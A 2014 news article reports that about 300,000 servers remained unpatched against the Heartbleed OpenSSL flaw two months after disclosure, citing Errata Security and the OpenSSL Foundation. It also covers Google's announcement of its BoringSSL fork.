Welcome Guest | Sign In
LinuxInsider.com

Heartbleed Flaw Goes Unpatched on 300K Servers: Report

Heartbleed Flaw Goes Unpatched on 300K Servers: Report

Perhaps the most difficult obstacle to overcome in the Heartbleed security mess is getting people to apply the patches necessary to correct the flaw. Although most of the servers identified as still vulnerable to Heartbleed belong to unknown firms, a few are located in well-known ones. "No computer should be exposed to the Internet that isn't regularly patched," warned Errata CEO Robert Graham.

By Richard Adhikari TechNewsWorld ECT News Network
06/23/14 4:41 PM PT

Two months after the Heartbleed vulnerability sent frissons of fear down the spines of IT managers everywhere, 300,000 servers still remain vulnerable, Errata Security said this weekend.

That figure has remained unchanged since May.

When the flaw was announced in April, Errata found 600,000 servers vulnerable.

"The norm is to do no patches at all for some systems, no matter how easy it is to patch," Errata CEO Robert Graham told TechNewsWorld.

"If they're retirement management systems, [being left unpatched] won't be a problem," Graham said, "but if they're on a power grid, there is a problem."

What Heartbleed Is and Does

Heartbleed, which has been around since 2011, lets hackers steal information protected by the SSL/TLS encryption used to secure the Internet.

OpenSSL stores a server's private key material in the memory space used by the code handling the heartbeat messages.

The flaw can be used to reveal up to 64 KB of memory to a connected client or server per heartbeat.

Users have to implement a patch issued by OpenSSL and go through all their certificates.

A Drop in the Ocean?

While 300,000 servers seems like a lot, "it isn't that big a number considering how big the Internet is," Steve Marquess, president of the OpenSSL Foundation, told TechNewsWorld.

Exactly how many servers are out there may never be known, because there is no uniform way of counting off the servers. For example, Errata's Graham estimates about 30 million servers support SSL, while Netcraft, which tracks domain names, set the figure at about 2.8 million.

"There's always going to be a certain number of systems that are going to be neglected," Marquess said. "You're never going to get that number down to zero. Look, there are still Windows 95 computers out there."

It is possible that some of the 300,000 unpatched servers Errata discovered last month already have been patched and new ones with the flaw have taken their place to keep the figure constant.

Most of the servers belong to unknown firms, but a few are located in well-known ones, Errata's Graham said, adding, "No computer should be exposed to the Internet that isn't regularly patched."

The Advent of BoringSSL

Meanwhile, staffer Adam Langley has announced that Google is changing the way it works with OpenSSL code.

Google has used patches on top of OpenSSL for years, he said.

Some have been accepted into the main OpenSSL repository, but many don't mesh with OpenSSL's guarantee of application programming interface (API) and application binary interface (ABI) stability, noted Langley, and many are "a little too experimental."

Things have grown "very complex," with more than 70 patches existing across multiple code bases for Android, Chrome and other products, he said, which are beginning to need subsets of these patches.

Going forward, Google will import changes from OpenSSL rather than write code on top of those patches, said Langley. The result, called "BoringSSL" for now, soon will begin appearing in the Chromium repository, and later in Android, as well as in Google's internal systems.

Again, there are no guarantees of API or ABI stability with this code.

No Threat to OpenSSL

Google is "not aiming to replace OpenSSL as an open source project. We will still be sending them bug fixes when we find them," Langley said.

"Google has extremely extensive worldwide operations and has had some very smart people doing extensive customization for some time," OpenSSL's Marquess said. "We work closely with those people, and I don't see any changes at all."

Further, the company will continue to fund the Linux Foundation's Core Infrastructure Initiative, a multimillion-dollar project set up by several vendors to fund open source products critical to core computing functions.


Richard Adhikari has written about high-tech for leading industry publications since the 1990s and wonders where it's all leading to. Will implanted RFID chips in humans be the Mark of the Beast? Will nanotech solve our coming food crisis? Does Sturgeon's Law still hold true? You can connect with Richard on Google+.


Facebook Twitter LinkedIn Google+ RSS